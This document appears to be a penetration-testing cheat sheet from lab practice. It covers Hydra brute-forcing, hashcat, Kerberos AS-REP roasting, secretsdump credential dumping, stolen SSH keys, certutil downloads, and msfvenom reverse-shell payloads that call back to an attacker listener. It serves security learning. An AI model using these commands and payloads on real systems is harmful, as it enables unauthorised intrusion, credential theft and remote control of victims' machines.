Start a simple web server in Kali:

```sh
service apache2 start
# default landing dir: /var/www/html
# To stop/kill the server: service apache2 stop
# To check Apache status: service apache2 status
```
Place the files you want to transfer to the target machine in the `/var/www/html/` directory. Then, from the target machine, fetch them over HTTP (browser, etc.) and save the files.
In Windows, use certutil from the CLI to download files (like wget in Linux):

```
certutil -urlcache -f http://[target ip]/filename.exe filename.exe
```

With the `-f` option, `-urlcache` forces fetching a specific URL and updating the cache.
Resource: documentation
Download the home/index page from a site:
```sh
curl http://[target ip]
```
Upload a file using PUT:
```sh
curl http://[target ip]/[subdir] --upload-file gk_put.txt
# or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
```

Note: `-X PUT` is redundant when using `-T` (which is short for `--upload-file`).
DNS (the Domain Name System) maps domain names to IP addresses (and back).
When you plug a domain name in your browser URI box…
This whole process is automagic with browsers but dig can do all this manually (and show us the results).
Syntax:

```sh
dig [domain] @[dns-server-ip]
# Example: dig google.com @1.1.1.1
```
GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.
You need a wordlist. In Kali, the wordlists live under `/usr/share/wordlists`.

Run GoBuster with a wordlist:

```sh
gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]
```
Flags:

| Flag | Description |
|---|---|
| `-e` | Print the full URLs in your console |
| `-u` | The target URL |
| `-w` | Path to your wordlist |
| `-U` and `-P` | Username and password for Basic Auth |
| `-p <x>` | Proxy to use for requests |
| `-c <http cookies>` | Specify a cookie for simulating your auth |
grep for a "string" in all the files from root (/) or whatever directory you want:

```sh
grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null
```

Options:

- `-r`: recursive; read all files under each directory, recursively
- `-n`: number; prefix each line of output with the 1-based line number within its input file
- `-w`: whole words; select only those lines containing matches that form whole words
- `-e [pattern]`: expression; search for all patterns given; protect the pattern with "quotes"

`2>/dev/null` sends STDERR to the abyss instead of to the screen.
A password recovery tool…
Example syntax:

- `-m`: mode; the hash type, from the table in the help file
- `-a`: attack mode, from a smaller table in the help file
- `-o`: output file (so you don't have to do a `--show` later)

```sh
hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m 18200: mode for Kerberos 5, etype 23, AS-REP
# -a 0: straight (i.e., dictionary) attack mode; the default attack mode
# -o: output file name, cracked.txt
```

If you forget to put in the `-o` for an output file, you'll need to re-run the same command you used to crack the password and add `--show` to it.
HashCat Wiki for help: here.
Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
Specify a single username and single password to try (lower case `-l` and `-p`):

```sh
hydra -l [user] -p [password] [target IP] [ftp | ssh | etc]
```

Specify lists of users and/or passwords to try (upper case `-L` and `-P`):

```sh
hydra -L [/path/to/users.txt] -P [/path/to/passwords.txt] -vV [target IP] [ftp | ssh | etc]
```
Options:

- `-t 4`: number of parallel connections per target
- `-l [user]`: single username of the account we are trying to compromise
- `-p [password]`: single password to try
- `-L [/path/to/]`: plaintext file containing possible usernames
- `-P [/path/to/]`: plaintext file containing possible passwords
- `-vV`: very verbose; shows the login+pass combo for each attempt
- `[ftp | ssh | etc]`: sets the protocol (see "supported services" below)

Be very careful with your brute-force speed. You could crash the system or DoS it. The `-t` (tasks) option sets the number of connects in parallel (the default is 16, for reference). Try `-t 2` or `-t 3` and see if that plays nicer, keeping it in the `-t 1` through `-t 4` range.

SMB:

```sh
hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb
```

SSH:

```sh
hydra -l student -P rockyou.txt [ip] ssh
```

MySQL:

```sh
hydra -l root -P /usr/share/metasploit_framework/data/wordlists/unix_passwords.txt [target ip] mysql
```

WebDAV (http login):

```sh
hydra -L /.../common-users.txt -P /.../common-passwords.txt [target ip] http-get /webdav/
# http-get : the protocol to be used
# /webdav/ : the directory where hydra can find the authentication mechanism
```

RDP:

```sh
hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
# -s : service port (if different from the default)
```
Supported services:
Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption.
Attack privilege requirements:

| Attack | Privilege requirement |
|---|---|
| Kerbrute Enumeration | No domain access required |
| Pass the Ticket | Access as a user to the domain required |
| Kerberoasting | Access as any user required |
| AS-REP Roasting | Access as any user required |
| Golden Ticket | Full domain compromise (domain admin) required |
| Silver Ticket | Service hash required |
| Skeleton Key | Full domain compromise (domain admin) required |
Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
Run `chmod 777 [binary name]` to make it executable (`chmod +x` is all that is actually needed).

Commands:

```sh
# to get the general help screen:
./kerbrute
# to get the help screen for a specific command:
./kerbrute [command name] -h
# specific help example:
./kerbrute userenum -h
# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt
# enumerate AD usernames example:
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt
# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt
```
Here are some usage examples. The Impacket example scripts are found in Kali under `/usr/share/doc/python3-impacket/examples`.
Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.
```sh
# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/
# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/
# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
```
Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [Source.]
Command:

```sh
python3 secretsdump.py test.local/john:password123@10.10.10.1
```
Some how-to stuff on interpreting the output: here.
Example (colon-separated values, `username:RID:LM hash:NTLM hash:::`):

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Administrator                     -> username
# 500                               -> RID (Relative ID)
# aad3b435b51404eeaad3b435b51404ee  -> LM (LAN Manager) hash; old & deprecated
# 31d6cfe0d16ae931b73c59d7e0c089c0  -> NTLM hash (for Pass-the-Hash)
```
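A small audit of a dump in this format, as an added example that is not part of the original notes or of Impacket: it flags accounts whose NT hash is the well-known hash of the empty password (the value shown in the line above) and counts accounts that still store a real LM hash; the sample dump lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): audit secretsdump-style
# user:RID:LM:NT::: lines for weak entries.
# Widely documented constants: the blank/disabled LM hash and the NT hash
# of the empty string (an account with no password set).
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0

# Constructed sample dump (svc_backup's hashes are made-up values).
SAMPLE_DUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::'

# find_empty_passwords: read dump lines on stdin and print "user (RID)"
# for every account whose NT hash equals the empty-password hash.
find_empty_passwords() {
  awk -F: -v empty_nt="$EMPTY_NT" '
    NF >= 4 && length($4) == 32 && tolower($4) == empty_nt { print $1 " (" $2 ")" }'
}

# count_lm_present: count accounts that still carry a real (non-blank) LM
# hash, i.e. the weak LM format is still being stored for them.
count_lm_present() {
  awk -F: -v empty_lm="$EMPTY_LM" '
    NF >= 4 && length($3) == 32 && tolower($3) != empty_lm { n++ }
    END { print n + 0 }'
}

# Usage: feed a real dump with  secretsdump_output.txt | find_empty_passwords
printf '%s\n' "$SAMPLE_DUMP" | find_empty_passwords
printf '%s\n' "$SAMPLE_DUMP" | count_lm_present
```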
To see the available payloads: `msfvenom -l payloads` (filter by piping to grep).
First, build a payload with MSFVenom (e.g., a reverse shell payload):
```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
#
# -p = payload
# LHOST = local host IP address (this is your machine's IP address)
# LPORT = local port to listen on (this is the port on your machine)
# -f = format (of the output)
# R = export the payload in raw format
```
A staged payload will follow this syntax (note the `/` delimiter before `reverse_tcp`):

```
windows/x64/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_tcp
```

A non-staged payload will follow this syntax (note the `_` instead):

```
windows/x64/meterpreter_reverse_tcp
linux/x86/meterpreter_reverse_tcp
```
After that, set up a listener on your attack machine:

```sh
nc -nvlp [listening port]
```
Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.
Ping Multiple IPs – One-Liners…
Windows:

```
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"
```

How it works:

- `FOR /L %i IN (1,1,254)`: create a loop from 1 to 254, the range of valid host addresses in a 192.168.0.0/24 network
- `DO ping -n 1 192.168.0.%i`: follow the FOR loop with the ping command to execute on each iteration
- `| FIND /i "Reply"`: filter to display only replies (kinda hinky, might need to tweak this a bit)

Redirect output to a file with: `> filename.txt`
Linux:

```sh
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done
```

How it works:

- `for ip in $(seq 1 254);`: create a loop from one to 254
- `do ping -c 1 192.168.1.$ip; done`: ping the IP address, substituting the loop variable for the last part of the address, and then end the statement

Redirect output to a file with: `> filename.txt`
Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html
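A less noisy version of the Linux sweep, as an added example that is not from the original notes or the cited source: it validates the host range, gives each probe a one-second timeout so dead hosts do not stall the loop, and prints only the addresses that answered. It assumes an iputils-style `ping` that supports `-c` and `-W`.

```shell
#!/bin/sh
# Added example (not from the original notes): a tidier ping sweep.
# Assumes an iputils-style ping with -c (count) and -W (timeout seconds).

# ip_range PREFIX START END: print PREFIX.N for N in START..END.
# Fails (exit 1, no output) unless 1 <= START <= END <= 254.
ip_range() {
  prefix="$1"; start="$2"; end="$3"
  [ "$start" -ge 1 ] && [ "$end" -le 254 ] && [ "$start" -le "$end" ] || return 1
  i="$start"
  while [ "$i" -le "$end" ]; do
    echo "$prefix.$i"
    i=$((i + 1))
  done
}

# sweep_range PREFIX START END: ping each host once with a 1 s timeout and
# print only the hosts that replied, e.g.  sweep_range 192.168.1 1 254
sweep_range() {
  ip_range "$1" "$2" "$3" | while read -r host; do
    if ping -c 1 -W 1 "$host" >/dev/null 2>&1; then
      echo "$host"
    fi
  done
}
```

Redirect the live-host list to a file the same way as above: `sweep_range 192.168.1 1 254 > live.txt`.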
```sh
ssh [user_name]@[host]   # host can be either an IP or a domain name
# OR
ssh -i [key-file] [user_name]@[host]
```

The default key name is `id_rsa`:

```
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
```

Note: you need to `chmod 600 id_rsa` in order for the file to be usable in a session (ssh ignores a private key that other users can read).

If you can obtain the `id_rsa` file of a target, just put it in your `~/.ssh` directory and ssh into the target machine. Or reference the key file with the `-i` switch if you put it in another directory somewhere.
Syntax:

```sh
scp [source] [destination]
```

Examples:

To copy a file from B to A while logged into B:

```sh
scp /path/to/file username@a:/path/to/destination   # [source] [destination]
```

To copy a file from B to A while logged into A:

```sh
scp username@b:/path/to/file /path/to/destination   # [source] [destination]
```
Listener: to listen on an interface on my local machine and see whether a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?):

```sh
tcpdump ip proto \\icmp -i [interface name: eth0, tun0, etc.]
# the doubled backslash gets a literal "\icmp" past the shell, which is how the pcap filter escapes the keyword
```